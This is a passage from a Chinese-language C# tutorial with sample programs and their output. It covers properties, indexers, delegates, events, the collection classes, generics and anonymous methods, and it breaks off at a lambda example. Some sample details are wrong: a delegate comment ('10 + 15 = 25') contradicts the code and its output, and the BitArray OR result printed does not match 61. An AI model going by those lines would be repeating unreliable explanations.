    2. 易于修改和扩展: 如果将字段直接暴露为公共字段,在修改字段名称、类型或者添加验证逻辑时,会影响到所有访问该字段的代码。而使用属性,可以在不影响其他代码的情况下修改属性的实现。
    3. 数据绑定和事件处理: 使用属性使得数据绑定更加容易。一些 GUI 应用程序框架(如 WPF、WinForms)能够自动绑定属性到用户界面元素,这样可以通过属性实现数据的显示和输入验证。此外,属性的 setter 可以触发事件,通知其他对象数据的变化。
    4. 符合面向对象的设计原则: 封装是面向对象编程的核心原则之一,它提供了更好的抽象和封装,使得代码更加模块化、可维护和可测试。

    ​虽然直接使用公共字段也可以达到相同的效果,但这种做法在实际开发中可能会带来更多的问题,例如难以控制访问权限、不利于后续的代码修改和维护等。因此,使用属性来访问私有字段是一种更好的实践,它能够提高代码的可靠性和灵活性。

    抽象属性(Abstract Properties)

    ​抽象类可拥有抽象属性,这些属性应在派生类中被实现。下面的程序说明了这点:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    using System;
    namespace runoob
    {
    public abstract class Person
    {
    public abstract string Name
    {
    get;
    set;
    }
    public abstract int Age
    {
    get;
    set;
    }
    }
    class Student : Person
    {

    private string code = "N.A";
    private string name = "N.A";
    private int age = 0;

    // 声明类型为 string 的 Code 属性
    public string Code
    {
    get
    {
    return code;
    }
    set
    {
    code = value;
    }
    }

    // 声明类型为 string 的 Name 属性
    public override string Name
    {
    get
    {
    return name;
    }
    set
    {
    name = value;
    }
    }

    // 声明类型为 int 的 Age 属性
    public override int Age
    {
    get
    {
    return age;
    }
    set
    {
    age = value;
    }
    }
    public override string ToString()
    {
    return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
    }
    }
    class ExampleDemo
    {
    public static void Main()
    {
    // 创建一个新的 Student 对象
    Student s = new Student();

    // 设置 student 的 code、name 和 age
    s.Code = "001";
    s.Name = "Zara";
    s.Age = 9;
    Console.WriteLine("Student Info:- {0}", s);
    // 增加年龄
    s.Age += 1;
    Console.WriteLine("Student Info:- {0}", s);
    Console.ReadKey();
    }
    }
    }
    1
    2
    Student Info:- Code = 001, Name = Zara, Age = 9
    Student Info:- Code = 001, Name = Zara, Age = 10

    C# 索引器(Indexer)

    索引器(Indexer) 允许一个对象可以像数组一样使用下标的方式来访问。

    ​当您为类定义一个索引器时,该类的行为就会像一个 虚拟数组(virtual array) 一样。您可以使用数组访问运算符 [ ] 来访问该类的的成员。

    索引器(Indexer)的用途

    ​索引器的行为的声明在某种程度上类似于属性(property)。就像属性(property),您可使用 getset 访问器来定义索引器。但是,属性返回或设置一个特定的数据成员,而索引器返回或设置对象实例的一个特定值。换句话说,它把实例数据分为更小的部分,并索引每个部分,获取或设置每个部分。

    ​定义一个属性(property)包括提供属性名称。索引器定义的时候不带有名称,但带有 this 关键字,它指向对象实例。下面的实例演示了这个概念:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    using System;
    namespace IndexerApplication
    {
    class IndexedNames
    {
    private string[] namelist = new string[size];
    static public int size = 10;
    public IndexedNames()
    {
    for (int i = 0; i < size; i++)
    namelist[i] = "N. A.";
    }
    public string this[int index]
    {
    get
    {
    string tmp;

    if (index >= 0 && index <= size - 1)
    {
    tmp = namelist[index];
    }
    else
    {
    tmp = "";
    }

    return (tmp);
    }
    set
    {
    if (index >= 0 && index <= size - 1)
    {
    namelist[index] = value;
    }
    }
    }

    static void Main(string[] args)
    {
    IndexedNames names = new IndexedNames();
    names[0] = "Zara";
    names[1] = "Riz";
    names[2] = "Nuha";
    names[3] = "Asif";
    names[4] = "Davinder";
    names[5] = "Sunil";
    names[6] = "Rubic";
    for (int i = 0; i < IndexedNames.size; i++)
    {
    Console.WriteLine(names[i]);
    }
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    Zara
    Riz
    Nuha
    Asif
    Davinder
    Sunil
    Rubic
    N. A.
    N. A.
    N. A.

    重载索引器(Indexer)

    ​索引器(Indexer)可被重载。索引器声明的时候也可带有多个参数,且每个参数可以是不同的类型。没有必要让索引器必须是整型的。C# 允许索引器可以是其他类型,例如,字符串类型。

    ​下面的实例演示了重载索引器:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    using System;
    namespace IndexerApplication
    {
    class IndexedNames
    {
    private string[] namelist = new string[size];
    static public int size = 10;
    public IndexedNames()
    {
    for (int i = 0; i < size; i++)
    {
    namelist[i] = "N. A.";
    }
    }
    public string this[int index]
    {
    get
    {
    string tmp;

    if (index >= 0 && index <= size - 1)
    {
    tmp = namelist[index];
    }
    else
    {
    tmp = "";
    }

    return (tmp);
    }
    set
    {
    if (index >= 0 && index <= size - 1)
    {
    namelist[index] = value;
    }
    }
    }
    public int this[string name]
    {
    get
    {
    int index = 0;
    while (index < size)
    {
    if (namelist[index] == name)
    {
    return index;
    }
    index++;
    }
    return index;
    }

    }

    static void Main(string[] args)
    {
    IndexedNames names = new IndexedNames();
    names[0] = "Zara";
    names[1] = "Riz";
    names[2] = "Nuha";
    names[3] = "Asif";
    names[4] = "Davinder";
    names[5] = "Sunil";
    names[6] = "Rubic";
    // 使用带有 int 参数的第一个索引器
    for (int i = 0; i < IndexedNames.size; i++)
    {
    Console.WriteLine(names[i]);
    }
    // 使用带有 string 参数的第二个索引器
    Console.WriteLine(names["Nuha"]);
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    Zara
    Riz
    Nuha
    Asif
    Davinder
    Sunil
    Rubic
    N. A.
    N. A.
    N. A.
    2

    C# 委托(Delegate)

    ​C# 中的委托(Delegate)类似于 C 或 C++ 中函数的指针委托(Delegate) 是存有对某个方法的引用的一种引用类型变量。引用可在运行时被改变。

    ​委托(Delegate)特别用于实现事件和回调方法。所有的委托(Delegate)都派生自 System.Delegate 类。

    实例化委托(Delegate)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    using System;

    delegate int NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger nc1 = new NumberChanger(AddNum);
    NumberChanger nc2 = new NumberChanger(MultNum);
    // 使用委托对象调用方法
    nc1(25); // 10 + 15 = 25
    Console.WriteLine("Value of Num: {0}", getNum());
    nc2(5); // 25 * 5 = 175
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    1
    2
    Value of Num: 35
    Value of Num: 175

    委托的多播(Multicasting of a Delegate)

    ​委托对象可使用 “+” 运算符进行合并。一个合并委托调用它所合并的两个委托。只有相同类型的委托可被合并。“-” 运算符可用于从合并的委托中移除组件委托。

    ​使用委托的这个有用的特点,您可以创建一个委托被调用时要调用的方法的调用列表。这被称为委托的 多播(multicasting),也叫组播。下面的程序演示了委托的多播:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    using System;

    delegate int NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger nc;
    NumberChanger nc1 = new NumberChanger(AddNum);
    NumberChanger nc2 = new NumberChanger(MultNum);
    nc = nc1;
    nc += nc2;
    // 调用多播
    nc(5); // (10 + 5) * 5 = 75
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    1
    Value of Num: 75

    委托(Delegate)的用途

    ​下面的实例演示了委托的用法。委托 printString 可用于引用带有一个字符串作为输入的方法,并不返回任何东西。

    ​我们使用这个委托来调用两个方法(将函数变成一个参数),第一个把字符串打印到控制台,第二个把字符串打印到文件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    using System;
    using System.IO;

    namespace DelegateAppl
    {
    class PrintString
    {
    static FileStream fs;
    static StreamWriter sw;
    // 委托声明
    public delegate void printString(string s);

    // 该方法打印到控制台
    public static void WriteToScreen(string str)
    {
    Console.WriteLine("The String is: {0}", str);
    }
    // 该方法打印到文件
    public static void WriteToFile(string s)
    {
    fs = new FileStream("c:\\message.txt", FileMode.Append, FileAccess.Write);
    sw = new StreamWriter(fs);
    sw.WriteLine(s);
    sw.Flush();
    sw.Close();
    fs.Close();
    }
    // 该方法把委托作为参数,并使用它调用方法
    public static void sendString(printString ps)
    {
    ps("Hello World");
    }
    static void Main(string[] args)
    {
    printString ps1 = new printString(WriteToScreen);
    printString ps2 = new printString(WriteToFile);
    sendString(ps1);
    sendString(ps2);
    Console.ReadKey();
    }
    }
    }

    C# 事件(Event)

    事件(Event) 基本上说是一个用户操作,如按键、点击、鼠标移动等等,或者是一些提示信息,如系统生成的通知。应用程序需要在事件发生时响应事件。例如,中断。

    C# 中使用事件机制实现线程间的通信。

    通过事件使用委托

    ​事件在类中声明且生成,且通过使用同一个类或其他类中的委托与事件处理程序关联。包含事件的类用于发布事件。这被称为 发布器(publisher) 类。其他接受该事件的类被称为 订阅器(subscriber) 类。事件使用 发布-订阅(publisher-subscriber) 模型。

    发布器(publisher) 是一个包含事件和委托定义的对象。事件和委托之间的联系也定义在这个对象中。发布器(publisher)类的对象调用这个事件,并通知其他的对象。

    订阅器(subscriber) 是一个接受事件并提供事件处理程序的对象。在发布器(publisher)类中的委托调用订阅器(subscriber)类中的方法(事件处理程序)。

    声明事件(Event)

    ​在类的内部声明事件,首先必须声明该事件的委托类型。例如:

    1
    public delegate void BoilerLogHandler(string status);

    ​然后,声明事件本身,使用 event 关键字:

    1
    2
    // 基于上面的委托定义事件
    public event BoilerLogHandler BoilerEventLog;

    示例

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    using System;
    namespace SimpleEvent
    {
    using System;
    /***********发布器类***********/
    public class EventTest
    {
    private int value;

    public delegate void NumManipulationHandler();

    public event NumManipulationHandler ChangeNum;

    protected virtual void OnNumChanged() // 为了允许子类(如果有的话)重写这个方法
    {
    if (ChangeNum != null)
    {
    ChangeNum(); /* 事件被触发,派发事件 ChangeNum */
    }
    else
    {
    Console.WriteLine("event not fire");
    Console.ReadKey(); /* 回车继续 */
    }
    }


    public EventTest() // 构造函数
    {
    int n = 5;
    SetValue(n);
    }


    public void SetValue(int n)
    {
    if (value != n) // 如果数据更新:
    {
    value = n;
    OnNumChanged();
    }
    }
    }


    /***********订阅器类***********/

    public class subscribEvent
    {
    public void printf()
    {
    Console.WriteLine("event fire");
    Console.ReadKey(); /* 回车继续 */
    }
    }

    /***********触发***********/
    public class MainClass
    {
    public static void Main()
    {
    EventTest e = new EventTest(); /* 实例化对象,构造函数将执行一次 OnNumChanged(),第一次没有触发事件 */
    subscribEvent v = new subscribEvent(); /* 实例化对象 */
    e.ChangeNum += new EventTest.NumManipulationHandler(v.printf); /* 注册:接收到消息时,执行函数:printf() */
    e.SetValue(7);
    e.SetValue(11);
    e.SetValue(11);
    e.SetValue(9);
    }
    }
    }
    1
    2
    3
    4
    event not fire
    event fire
    event fire
    event fire

    C# 集合(Collection)

    ​集合(Collection)类是专门用于数据存储和检索的类。这些类提供了对:

    • 栈(stack)
    • 队列(queue)
    • 列表(list)
    • 哈希表(hash table)

    的支持。大多数集合类实现了相同的接口。

    List

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    using System;
    using static System.Console;
    using System.Collections.Generic;
    namespace HelloWorldApplication
    {
    class HelloWorld
    {
    static void Main(string[] args)
    {
    var a = new List<int>();
    a.Add(2);
    a.Add(6);
    a.Add(2);
    a.Add(10);
    Console.WriteLine($"第一个数为{a[0]}");
    a.Remove(2);//删去第一个匹配此条件的项
    a.Sort();
    foreach (var a2 in a)
    {
    WriteLine(a2);
    }
    bool a3 = a.Contains(2);
    WriteLine(a3);
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    5
    第一个数为2
    2
    6
    10
    True

    动态数组(ArrayList)

    ​在 C# 中,List<T>ArrayList 都是用来存储集合数据的类,但它们在实现和使用上有一些重要的区别:

    1. 类型安全性
      • ListList<T> 是泛型类,其中的 <T> 表示可以存储的元素类型。这意味着在创建 List<T> 实例时,你必须指定存储在列表中的元素类型。例如,List<int> 表示只能存储整数类型的列表,List<string> 表示只能存储字符串类型的列表。由于是泛型类,编译器可以在编译时执行类型检查,确保在编写代码时就能捕获到类型不匹配的错误。
      • ArrayListArrayList 是非泛型类,可以存储任意类型的对象。在 ArrayList 中,存储的是 object 类型的元素,因此可以存储任何类型的对象。但这也带来了一个问题,即当你从 ArrayList 中取出元素时,需要进行显式的类型转换,这可能导致运行时类型转换错误。
    2. 性能
      • List 通常比 ArrayList 性能更好,因为它避免了装箱和拆箱的开销。装箱是将值类型转换为对象类型,而拆箱是将对象类型转换为值类型。由于 List<T> 是泛型的,可以直接存储值类型,因此避免了这些额外的操作。
      • ArrayList 存储的是 object 类型,因此当你从 ArrayList 中取出元素时,需要进行类型转换(拆箱),这会引入性能损失。
    3. 扩展性
      • List 支持 LINQ 查询,因为它是泛型的,可以与 LINQ 方法无缝集成,提供了丰富的集合操作功能。
      • ArrayList 由于存储的是 object 类型,无法直接与 LINQ 方法一起使用,需要在使用时进行显式的类型转换。

    ​基于以上区别,推荐在大多数情况下优先选择 List<T>,因为它提供了类型安全、性能更好以及更好的扩展性。只有在需要与遗留代码或者需要存储不同类型对象的情况下,才考虑使用 ArrayList

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    using System;
    using System.Collections;

    namespace CollectionApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    ArrayList al = new ArrayList();

    Console.WriteLine("Adding some objects:");
    al.Add(45);
    al.Add("A");
    al.Add(33);
    al.Add(56);
    al.Add(true);
    al.Add(23);
    al.Add(9);

    Console.WriteLine("Capacity: {0} ", al.Capacity);
    Console.WriteLine("Count: {0}", al.Count);

    Console.Write("Content: ");
    foreach (var i in al)
    {
    Console.Write(i + " ");
    }
    Console.WriteLine();
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    Adding some objects:
    Capacity: 8
    Count: 7
    Content: 45 A 33 56 True 23 9

    哈希表(Hashtable)

    ​Hashtable 类代表了一系列基于键的哈希代码组织起来的键/值对。它使用来访问集合中的元素。

    ​当您使用访问元素时,则使用哈希表,而且您可以识别一个有用的键值。哈希表中的每一项都有一个键/值对。键用于访问集合中的项目。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Hashtable ht = new Hashtable();


    ht.Add("001", "Zara Ali");
    ht.Add("002", "Abida Rehman");
    ht.Add("003", "Joe Holzner");
    ht.Add("004", "Mausam Benazir Nur");
    ht.Add("005", "M. Amlan");
    ht.Add("006", "M. Arif");
    ht.Add("007", "Ritesh Saikia");

    if (ht.ContainsValue("Nuha Ali"))
    {
    Console.WriteLine("This student name is already in the list");
    }
    else
    {
    ht.Add("008", "Nuha Ali");
    }
    // 获取键的集合
    ICollection key = ht.Keys;

    foreach (string k in key)
    {
    Console.WriteLine(k + ": " + ht[k]);
    }
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    006: M. Arif
    007: Ritesh Saikia
    008: Nuha Ali
    003: Joe Holzner
    002: Abida Rehman
    004: Mausam Benazir Nur
    001: Zara Ali
    005: M. Amlan

    字典

    ​在 C# 中,哈希表(HashTable)和字典(Dictionary)是两种不同的数据结构,它们具有以下区别:

    1. 实现方式
      • 哈希表(HashTable)System.Collections.Hashtable 是在早期版本的.NET中提供的,它实现了一个散列表,使用哈希函数来存储和访问键值对。它支持通过哈希码进行快速的插入、删除和查找操作。哈希表中的键和值可以是任意对象,但通常情况下要求键和值都不为null。
      • 字典(Dictionary)System.Collections.Generic.Dictionary<TKey, TValue> 是泛型类型,在.NET Framework 2.0及以后的版本中引入。字典也是基于哈希表的实现,但它是类型安全的,允许指定键(Key)和值(Value)的类型。这使得字典在类型检查和类型安全性方面比哈希表更优越。
    2. 类型安全性
      • 哈希表:由于哈希表存储的是object类型,所以在检索值时需要进行显式的类型转换,这可能导致运行时类型错误或异常。
      • 字典:字典使用泛型参数 <TKey, TValue> 定义键和值的类型,因此编译器能够在编译时捕获类型错误,提供更安全的操作。
    3. 性能
      • 在大多数情况下,字典的性能会优于哈希表,因为字典的实现允许更高效的内部优化,而且由于泛型类型的引入,它可以更准确地利用内存和处理器的优化特性。

    ​综上所述,尽管哈希表和字典在功能上有所重叠(即存储键值对的能力),但字典在C#中通常是更好的选择,特别是在需要类型安全、更好性能和更清晰的编码方面。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    using System;
    using System.Collections.Generic;
    namespace HelloWorldApplication
    {
    class A
    {
    static void Main(string[] args)
    {
    var a = new Dictionary<int, int>();
    a.Add(12, 14);
    a.Add(0, 1);
    Console.WriteLine("删去前的Count" + a.Count);
    a.Remove(0);
    Console.WriteLine(a[12]);
    Console.WriteLine(a.Count);
    Console.WriteLine(a.ContainsKey(12));
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    删去前的Count2
    14
    1
    True

    排序列表(SortedList)

    ​SortedList 类代表了一系列按照键来排序的键/值对,这些键值对可以通过键和索引来访问。

    ​排序列表是数组和哈希表的组合。它包含一个可使用键或索引访问各项的列表。如果您使用索引访问各项,则它是一个动态数组(ArrayList),如果您使用键访问各项,则它是一个哈希表(Hashtable)。集合中的各项总是按键值排序。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    SortedList sl = new SortedList();

    sl.Add("003", "Joe Holzner");
    sl.Add("001", "Zara Ali");
    sl.Add("004", "Mausam Benazir Nur");
    sl.Add("002", "Abida Rehman");
    sl.Add("107", "Ritesh Saikia");
    sl.Add("006", "M. Arif");
    sl.Add("00A", "M. Amlan");

    if (sl.ContainsValue("Nuha Ali"))
    {
    Console.WriteLine("This student name is already in the list");
    }
    else
    {
    sl.Add("008", "Nuha Ali");
    }

    // 获取键的集合
    ICollection key = sl.Keys;

    foreach (string k in key)
    {
    Console.WriteLine(k + ": " + sl[k]);
    }
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    001: Zara Ali
    002: Abida Rehman
    003: Joe Holzner
    004: Mausam Benazir Nur
    006: M. Arif
    008: Nuha Ali
    00A: M. Amlan
    107: Ritesh Saikia

    堆栈(Stack)

    堆栈(Stack)代表了一个后进先出的对象集合。当您需要对各项进行后进先出的访问时,则使用堆栈。当您在列表中添加一项,称为推入元素,当您从列表中移除一项时,称为弹出元素。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Stack st = new Stack();

    st.Push('A');
    st.Push('M');
    st.Push('G');
    st.Push('W');

    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    Console.WriteLine();

    st.Push('V');
    st.Push('H');
    Console.WriteLine("The next poppable value in stack: {0}",
    st.Peek());
    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    Console.WriteLine();

    Console.WriteLine("Removing values ");
    st.Pop();
    st.Pop();
    st.Pop();

    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    Current stack:
    W G M A
    The next poppable value in stack: H
    Current stack:
    H V W G M A
    Removing values
    Current stack:
    G M A

    队列(Queue)

    ​**队列(Queue)代表了一个先进先出的对象集合。**当您需要对各项进行先进先出的访问时,则使用队列。当您在列表中添加一项,称为入队,当您从列表中移除一项时,称为出队。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Queue q = new Queue();

    q.Enqueue('A');
    q.Enqueue('M');
    q.Enqueue('G');
    q.Enqueue('W');

    Console.WriteLine("Current queue: ");
    foreach (char c in q)
    Console.Write(c + " ");
    Console.WriteLine();
    q.Enqueue('V');
    q.Enqueue('H');
    Console.WriteLine("Current queue: ");
    foreach (char c in q)
    Console.Write(c + " ");
    Console.WriteLine();
    Console.WriteLine("Removing some values ");
    char ch = (char)q.Dequeue();
    Console.WriteLine("The removed value: {0}", ch);
    ch = (char)q.Dequeue();
    Console.WriteLine("The removed value: {0}", ch);
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    Current queue:
    A M G W
    Current queue:
    A M G W V H
    Removing some values
    The removed value: A
    The removed value: M

    点阵列(BitArray)

    ​BitArray 类管理一个紧凑型的位值数组,它使用布尔值来表示,其中 true 表示位是开启的(1),false 表示位是关闭的(0)。

    ​当您需要存储位,但是事先不知道位数时,则使用点阵列。您可以使用整型索引从点阵列集合中访问各项,索引从零开始。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 创建两个大小为 8 的点阵列
    BitArray ba1 = new BitArray(8);
    BitArray ba2 = new BitArray(8);
    byte[] a = { 60 };
    byte[] b = { 13 };

    // 把值 60 和 13 存储到点阵列中
    ba1 = new BitArray(a);
    ba2 = new BitArray(b);

    // ba1 的内容
    Console.WriteLine("Bit array ba1: 60");
    for (int i = 0; i < ba1.Count; i++)
    {
    Console.Write("{0, -6} ", ba1[i]);
    }
    Console.WriteLine();

    // ba2 的内容
    Console.WriteLine("Bit array ba2: 13");
    for (int i = 0; i < ba2.Count; i++)
    {
    Console.Write("{0, -6} ", ba2[i]);
    }
    Console.WriteLine();


    BitArray ba3 = new BitArray(8);
    ba3 = ba1.And(ba2);

    // ba3 的内容
    Console.WriteLine("Bit array ba3 after AND operation: 12");
    for (int i = 0; i < ba3.Count; i++)
    {
    Console.Write("{0, -6} ", ba3[i]);
    }
    Console.WriteLine();

    ba3 = ba1.Or(ba2);
    // ba3 的内容
    Console.WriteLine("Bit array ba3 after OR operation: 61");
    for (int i = 0; i < ba3.Count; i++)
    {
    Console.Write("{0, -6} ", ba3[i]);
    }
    Console.WriteLine();

    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    Bit array ba1: 60
    False False True True True True False False
    Bit array ba2: 13
    True False True True False False False False
    Bit array ba3 after AND operation: 12
    False False True True False False False False
    Bit array ba3 after OR operation: 61
    True False True True False False False False

    ​感觉就是把一个数的二进制形式拆成 bool 形式来表示。

    泛型(Generic)

    泛型(Generic) 允许您延迟编写类或方法中的编程元素的数据类型的规范,直到实际在程序中使用它的时候。换句话说,泛型允许您编写一个可以与任何数据类型一起工作的类或方法。

    ​您可以通过数据类型的替代参数编写类或方法的规范。当编译器遇到类的构造函数或方法的函数调用时,它会生成代码来处理指定的数据类型。

    ​您可以通过类型参数定义泛型委托。例如:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    using System;
    using System.Collections.Generic;

    delegate T NumberChanger<T>(T n);
    namespace GenericDelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger<int> nc1 = new NumberChanger<int>(AddNum);
    NumberChanger<int> nc2 = new NumberChanger<int>(MultNum);
    // 使用委托对象调用方法
    nc1(25);
    Console.WriteLine("Value of Num: {0}", getNum());
    nc2(5);
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    1
    2
    Value of Num: 35
    Value of Num: 175

    C# 匿名方法

    ​在 C# 中,匿名函数是一种没有名字的方法,可以在代码中定义和使用。

    ​我们已经提到过,委托是用于引用与其具有相同标签的方法。换句话说,您可以使用委托对象调用可由委托引用的方法。

    匿名方法(Anonymous methods) 提供了一种传递代码块作为委托参数的技术。

    ​在匿名方法中您不需要指定返回类型,它是从方法主体内的 return 语句推断的。

    Lambda 表达式

    ​Lambda 表达式是一个简洁的语法,用于创建匿名函数。它们通常用于 LINQ 查询和委托。

    1
    2
    3
    (parameters) => expression
    // 或
    (parameters) => { statement; }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    // 示例:使用 Lambda 表达式定义一个委托
    Func<int, int, int> add = (a, b) => a + b;
    Console.WriteLine(add(2, 3)); // 输出 5

    // 示例:使用 Lambda 表达式过滤数组中的元素
    int[] numbers = { 1, 2, 3, 4, 5 };
    var evenNumbers = numbers.Where(n => n % 2 == 0);
    foreach (var num in evenNumbers)
    {
    Console.WriteLine(num); // 输出 2 4
    }

    匿名方法

    ​匿名方法是通过使用 delegate 关键字创建委托实例来声明的。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    using System;

    delegate void NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static void AddNum(int p)
    {
    num += p;
    Console.WriteLine("Named Method: {0}", num);
    }

    public static void MultNum(int q)
    {
    num *= q;
    Console.WriteLine("Named Method: {0}", num);
    }

    static void Main(string[] args)
    {
    // 使用匿名方法创建委托实例
    NumberChanger nc = delegate(int x)
    {
    Console.WriteLine("Anonymous Method: {0}", x);
    };

    // 使用匿名方法调用委托
    nc(10);

    // 使用命名方法实例化委托
    nc = new NumberChanger(AddNum);

    // 使用命名方法调用委托
    nc(5);

    // 使用另一个命名方法实例化委托
    nc = new NumberChanger(MultNum);

    // 使用命名方法调用委托
    nc(2);
    Console.ReadKey();
    }
    }
    }

    ​在 C# 2.0 及更高版本中,引入了 lambda 表达式,它是一种更简洁的语法形式,用于编写匿名方法。

    ​使用 lambda 表达式:

    1
